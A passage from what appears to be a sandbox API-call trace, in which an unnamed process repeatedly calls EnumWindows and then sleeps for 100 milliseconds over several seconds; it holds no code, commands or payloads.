[0285.900] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.902] Sleep (dwMilliseconds=0x64) [0285.931] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.933] Sleep (dwMilliseconds=0x64) [0285.944] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.946] Sleep (dwMilliseconds=0x64) [0285.982] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0285.984] Sleep (dwMilliseconds=0x64) [0286.023] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.025] Sleep (dwMilliseconds=0x64) [0286.027] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.028] Sleep (dwMilliseconds=0x64) [0286.062] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.101] Sleep (dwMilliseconds=0x64) [0286.110] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.111] Sleep (dwMilliseconds=0x64) [0286.140] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.141] Sleep (dwMilliseconds=0x64) [0286.178] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.180] Sleep (dwMilliseconds=0x64) [0286.193] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.194] Sleep (dwMilliseconds=0x64) [0286.220] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.221] Sleep (dwMilliseconds=0x64) [0286.258] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.260] Sleep (dwMilliseconds=0x64) [0286.281] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.282] Sleep (dwMilliseconds=0x64) [0286.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.476] Sleep (dwMilliseconds=0x64) [0286.534] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.536] Sleep (dwMilliseconds=0x64) [0286.665] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.666] Sleep (dwMilliseconds=0x64) [0286.686] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.688] Sleep (dwMilliseconds=0x64) [0286.730] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.732] Sleep (dwMilliseconds=0x64) [0286.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.755] Sleep (dwMilliseconds=0x64) [0286.777] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.778] Sleep (dwMilliseconds=0x64) [0286.830] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.831] Sleep (dwMilliseconds=0x64) [0286.838] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.839] Sleep (dwMilliseconds=0x64) [0286.870] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.872] Sleep (dwMilliseconds=0x64) [0286.911] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.912] Sleep (dwMilliseconds=0x64) [0286.917] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.918] Sleep (dwMilliseconds=0x64) [0286.951] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.953] Sleep (dwMilliseconds=0x64) [0286.981] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.983] Sleep (dwMilliseconds=0x64) [0286.992] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0286.995] Sleep (dwMilliseconds=0x64) [0287.031] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.033] Sleep (dwMilliseconds=0x64) [0287.069] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.071] Sleep (dwMilliseconds=0x64) [0287.075] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.076] Sleep (dwMilliseconds=0x64) [0287.108] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.110] Sleep (dwMilliseconds=0x64) [0287.145] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.146] Sleep (dwMilliseconds=0x64) [0287.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.153] Sleep (dwMilliseconds=0x64) [0287.186] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.188] Sleep (dwMilliseconds=0x64) [0287.223] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.224] Sleep (dwMilliseconds=0x64) [0287.233] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.234] Sleep (dwMilliseconds=0x64) [0287.263] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.265] Sleep (dwMilliseconds=0x64) [0287.300] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.302] Sleep (dwMilliseconds=0x64) [0287.324] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.325] Sleep (dwMilliseconds=0x64) [0287.356] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.358] Sleep (dwMilliseconds=0x64) [0287.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.397] Sleep (dwMilliseconds=0x64) [0287.414] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.416] Sleep (dwMilliseconds=0x64) [0287.449] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.451] Sleep (dwMilliseconds=0x64) [0287.492] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.494] Sleep (dwMilliseconds=0x64) [0287.522] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.541] Sleep (dwMilliseconds=0x64) [0287.683] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.685] Sleep (dwMilliseconds=0x64) [0287.747] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.748] Sleep (dwMilliseconds=0x64) [0287.798] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.800] Sleep (dwMilliseconds=0x64) [0287.881] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.886] Sleep (dwMilliseconds=0x64) [0287.908] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.912] Sleep (dwMilliseconds=0x64) [0287.930] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.932] Sleep (dwMilliseconds=0x64) [0287.970] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.972] Sleep (dwMilliseconds=0x64) [0287.985] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0287.986] Sleep (dwMilliseconds=0x64) [0288.011] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.012] Sleep (dwMilliseconds=0x64) [0288.047] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.048] Sleep (dwMilliseconds=0x64) [0288.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.051] Sleep (dwMilliseconds=0x64) [0288.087] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.089] Sleep (dwMilliseconds=0x64) [0288.112] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.113] Sleep (dwMilliseconds=0x64) [0288.126] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.128] Sleep (dwMilliseconds=0x64) [0288.164] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.165] Sleep (dwMilliseconds=0x64) [0288.177] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.178] Sleep (dwMilliseconds=0x64) [0288.202] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.204] Sleep (dwMilliseconds=0x64) [0288.239] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.240] Sleep (dwMilliseconds=0x64) [0288.243] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.243] Sleep (dwMilliseconds=0x64) [0288.280] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.282] Sleep (dwMilliseconds=0x64) [0288.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.330] Sleep (dwMilliseconds=0x64) [0288.367] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.369] Sleep (dwMilliseconds=0x64) [0288.388] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.388] Sleep (dwMilliseconds=0x64) [0288.406] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.407] Sleep (dwMilliseconds=0x64) [0288.448] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.449] Sleep (dwMilliseconds=0x64) [0288.459] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.460] Sleep (dwMilliseconds=0x64) [0288.490] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.491] Sleep (dwMilliseconds=0x64) [0288.522] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.523] Sleep (dwMilliseconds=0x64) [0288.529] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.530] Sleep (dwMilliseconds=0x64) [0288.602] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.603] Sleep (dwMilliseconds=0x64) [0288.690] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.691] Sleep (dwMilliseconds=0x64) [0288.698] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.699] Sleep (dwMilliseconds=0x64) [0288.741] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.743] Sleep (dwMilliseconds=0x64) [0288.778] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.780] Sleep (dwMilliseconds=0x64) [0288.794] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.795] Sleep (dwMilliseconds=0x64) [0288.830] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.831] Sleep (dwMilliseconds=0x64) [0288.847] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.847] Sleep (dwMilliseconds=0x64) [0288.869] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.873] Sleep (dwMilliseconds=0x64) [0288.907] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.909] Sleep (dwMilliseconds=0x64) [0288.919] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.920] Sleep (dwMilliseconds=0x64) [0288.949] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.951] Sleep (dwMilliseconds=0x64) [0288.984] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.985] Sleep (dwMilliseconds=0x64) [0288.989] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0288.989] Sleep (dwMilliseconds=0x64) [0289.032] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.034] Sleep (dwMilliseconds=0x64) [0289.057] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.058] Sleep (dwMilliseconds=0x64) [0289.072] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.073] Sleep (dwMilliseconds=0x64) [0289.109] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.111] Sleep (dwMilliseconds=0x64) [0289.133] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.135] Sleep (dwMilliseconds=0x64) [0289.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.154] Sleep (dwMilliseconds=0x64) [0289.189] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.190] Sleep (dwMilliseconds=0x64) [0289.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.209] Sleep (dwMilliseconds=0x64) [0289.231] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.232] Sleep (dwMilliseconds=0x64) [0289.267] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.268] Sleep (dwMilliseconds=0x64) [0289.278] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.279] Sleep (dwMilliseconds=0x64) [0289.313] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.315] Sleep (dwMilliseconds=0x64) [0289.349] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.350] Sleep (dwMilliseconds=0x64) [0289.352] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.353] Sleep (dwMilliseconds=0x64) [0289.391] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.393] Sleep (dwMilliseconds=0x64) [0289.416] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.417] Sleep (dwMilliseconds=0x64) [0289.430] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.432] Sleep (dwMilliseconds=0x64) [0289.469] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.470] Sleep (dwMilliseconds=0x64) [0289.484] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.485] Sleep (dwMilliseconds=0x64) [0289.507] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.508] Sleep (dwMilliseconds=0x64) [0289.543] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.544] Sleep (dwMilliseconds=0x64) [0289.548] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.549] Sleep (dwMilliseconds=0x64) [0289.612] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.616] Sleep (dwMilliseconds=0x64) [0289.673] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.674] Sleep (dwMilliseconds=0x64) [0289.678] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.679] Sleep (dwMilliseconds=0x64) [0289.724] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.727] Sleep (dwMilliseconds=0x64) [0289.769] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.771] Sleep (dwMilliseconds=0x64) [0289.773] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.775] Sleep (dwMilliseconds=0x64) [0289.819] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.821] Sleep (dwMilliseconds=0x64) [0289.850] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.852] Sleep (dwMilliseconds=0x64) [0289.860] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.862] Sleep (dwMilliseconds=0x64) [0289.898] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.899] Sleep (dwMilliseconds=0x64) [0289.924] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.926] Sleep (dwMilliseconds=0x64) [0289.939] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0289.941] Sleep (dwMilliseconds=0x64) [0290.012] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.014] Sleep (dwMilliseconds=0x64) [0290.032] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.035] Sleep (dwMilliseconds=0x64) [0290.056] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.057] Sleep (dwMilliseconds=0x64) [0290.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.095] Sleep (dwMilliseconds=0x64) [0290.112] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.115] Sleep (dwMilliseconds=0x64) [0290.136] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.138] Sleep (dwMilliseconds=0x64) [0290.178] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.186] Sleep (dwMilliseconds=0x64) [0290.218] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.219] Sleep (dwMilliseconds=0x64) [0290.249] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.250] Sleep (dwMilliseconds=0x64) [0290.257] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.258] Sleep (dwMilliseconds=0x64) [0290.292] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.294] Sleep (dwMilliseconds=0x64) [0290.323] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.324] Sleep (dwMilliseconds=0x64) [0290.340] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.342] Sleep (dwMilliseconds=0x64) [0290.377] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.379] Sleep (dwMilliseconds=0x64) [0290.391] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.393] Sleep (dwMilliseconds=0x64) [0290.416] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.418] Sleep (dwMilliseconds=0x64) [0290.453] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.455] Sleep (dwMilliseconds=0x64) [0290.459] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.459] Sleep (dwMilliseconds=0x64) [0290.508] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.509] Sleep (dwMilliseconds=0x64) [0290.543] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.544] Sleep (dwMilliseconds=0x64) [0290.548] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.549] Sleep (dwMilliseconds=0x64) [0290.607] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.608] Sleep (dwMilliseconds=0x64) [0290.640] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.641] Sleep (dwMilliseconds=0x64) [0290.653] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.653] Sleep (dwMilliseconds=0x64) [0290.690] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.692] Sleep (dwMilliseconds=0x64) [0290.711] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.712] Sleep (dwMilliseconds=0x64) [0290.731] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.733] Sleep (dwMilliseconds=0x64) [0290.767] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.769] Sleep (dwMilliseconds=0x64) [0290.775] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.776] Sleep (dwMilliseconds=0x64) [0290.808] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.809] Sleep (dwMilliseconds=0x64) [0290.837] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.839] Sleep (dwMilliseconds=0x64) [0290.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.850] Sleep (dwMilliseconds=0x64) [0290.891] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.892] Sleep (dwMilliseconds=0x64) [0290.918] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.919] Sleep (dwMilliseconds=0x64) [0290.937] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.938] Sleep (dwMilliseconds=0x64) [0290.975] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.976] Sleep (dwMilliseconds=0x64) [0290.989] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0290.990] Sleep (dwMilliseconds=0x64) [0291.013] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.015] Sleep (dwMilliseconds=0x64) [0291.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.053] Sleep (dwMilliseconds=0x64) [0291.060] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.061] Sleep (dwMilliseconds=0x64) [0291.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.095] Sleep (dwMilliseconds=0x64) [0291.131] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.133] Sleep (dwMilliseconds=0x64) [0291.138] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.138] Sleep (dwMilliseconds=0x64) [0291.274] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.278] Sleep (dwMilliseconds=0x64) [0291.322] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.323] Sleep (dwMilliseconds=0x64) [0291.326] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.327] Sleep (dwMilliseconds=0x64) [0291.363] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.364] Sleep (dwMilliseconds=0x64) [0291.386] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.387] Sleep (dwMilliseconds=0x64) [0291.401] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.403] Sleep (dwMilliseconds=0x64) [0291.437] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.439] Sleep (dwMilliseconds=0x64) [0291.452] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.478] Sleep (dwMilliseconds=0x64) [0291.513] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.514] Sleep (dwMilliseconds=0x64) [0291.515] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.516] Sleep (dwMilliseconds=0x64) [0291.577] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.578] Sleep (dwMilliseconds=0x64) [0291.615] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.617] Sleep (dwMilliseconds=0x64) [0291.621] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.622] Sleep (dwMilliseconds=0x64) [0291.687] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.689] Sleep (dwMilliseconds=0x64) [0291.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.721] Sleep (dwMilliseconds=0x64) [0291.728] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.729] Sleep (dwMilliseconds=0x64) [0291.766] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.767] Sleep (dwMilliseconds=0x64) [0291.787] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.788] Sleep (dwMilliseconds=0x64) [0291.808] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.809] Sleep (dwMilliseconds=0x64) [0291.845] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.847] Sleep (dwMilliseconds=0x64) [0291.851] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.851] Sleep (dwMilliseconds=0x64) [0291.885] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.886] Sleep (dwMilliseconds=0x64) [0291.910] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.911] Sleep (dwMilliseconds=0x64) [0291.925] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.926] Sleep (dwMilliseconds=0x64) [0291.962] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.964] Sleep (dwMilliseconds=0x64) [0291.978] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0291.979] Sleep (dwMilliseconds=0x64) [0292.005] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.007] Sleep (dwMilliseconds=0x64) [0292.044] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.046] Sleep (dwMilliseconds=0x64) [0292.056] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.057] Sleep (dwMilliseconds=0x64) [0292.085] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.087] Sleep (dwMilliseconds=0x64) [0292.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.116] Sleep (dwMilliseconds=0x64) [0292.124] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.161] Sleep (dwMilliseconds=0x64) [0292.181] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.182] Sleep (dwMilliseconds=0x64) [0292.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.209] Sleep (dwMilliseconds=0x64) [0292.243] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.245] Sleep (dwMilliseconds=0x64) [0292.250] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.251] Sleep (dwMilliseconds=0x64) [0292.283] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.285] Sleep (dwMilliseconds=0x64) [0292.318] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.319] Sleep (dwMilliseconds=0x64) [0292.332] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.334] Sleep (dwMilliseconds=0x64) [0292.385] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.387] Sleep (dwMilliseconds=0x64) [0292.425] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.427] Sleep (dwMilliseconds=0x64) [0292.447] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.452] Sleep (dwMilliseconds=0x64) [0292.509] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.511] Sleep (dwMilliseconds=0x64) [0292.534] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.535] Sleep (dwMilliseconds=0x64) [0292.569] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.571] Sleep (dwMilliseconds=0x64) [0292.610] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.612] Sleep (dwMilliseconds=0x64) [0292.636] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.637] Sleep (dwMilliseconds=0x64) [0292.650] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.652] Sleep (dwMilliseconds=0x64) [0292.694] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.695] Sleep (dwMilliseconds=0x64) [0292.717] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.719] Sleep (dwMilliseconds=0x64) [0292.734] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.774] Sleep (dwMilliseconds=0x64) [0292.802] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.804] Sleep (dwMilliseconds=0x64) [0292.815] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.817] Sleep (dwMilliseconds=0x64) [0292.857] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.859] Sleep (dwMilliseconds=0x64) [0292.905] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.908] Sleep (dwMilliseconds=0x64) [0292.910] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.910] Sleep (dwMilliseconds=0x64) [0292.949] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.950] Sleep (dwMilliseconds=0x64) [0292.985] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.987] Sleep (dwMilliseconds=0x64) [0292.997] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0292.999] Sleep (dwMilliseconds=0x64) [0293.027] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.029] Sleep (dwMilliseconds=0x64) [0293.065] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.067] Sleep (dwMilliseconds=0x64) [0293.077] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.078] Sleep (dwMilliseconds=0x64) [0293.107] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.109] Sleep (dwMilliseconds=0x64) [0293.144] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.146] Sleep (dwMilliseconds=0x64) [0293.155] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.157] Sleep (dwMilliseconds=0x64) [0293.187] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.189] Sleep (dwMilliseconds=0x64) [0293.225] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.227] Sleep (dwMilliseconds=0x64) [0293.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.265] Sleep (dwMilliseconds=0x64) [0293.302] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.303] Sleep (dwMilliseconds=0x64) [0293.315] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.317] Sleep (dwMilliseconds=0x64) [0293.354] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.357] Sleep (dwMilliseconds=0x64) [0293.393] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.394] Sleep (dwMilliseconds=0x64) [0293.396] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.397] Sleep (dwMilliseconds=0x64) [0293.436] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.438] Sleep (dwMilliseconds=0x64) [0293.480] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0293.481] Sleep 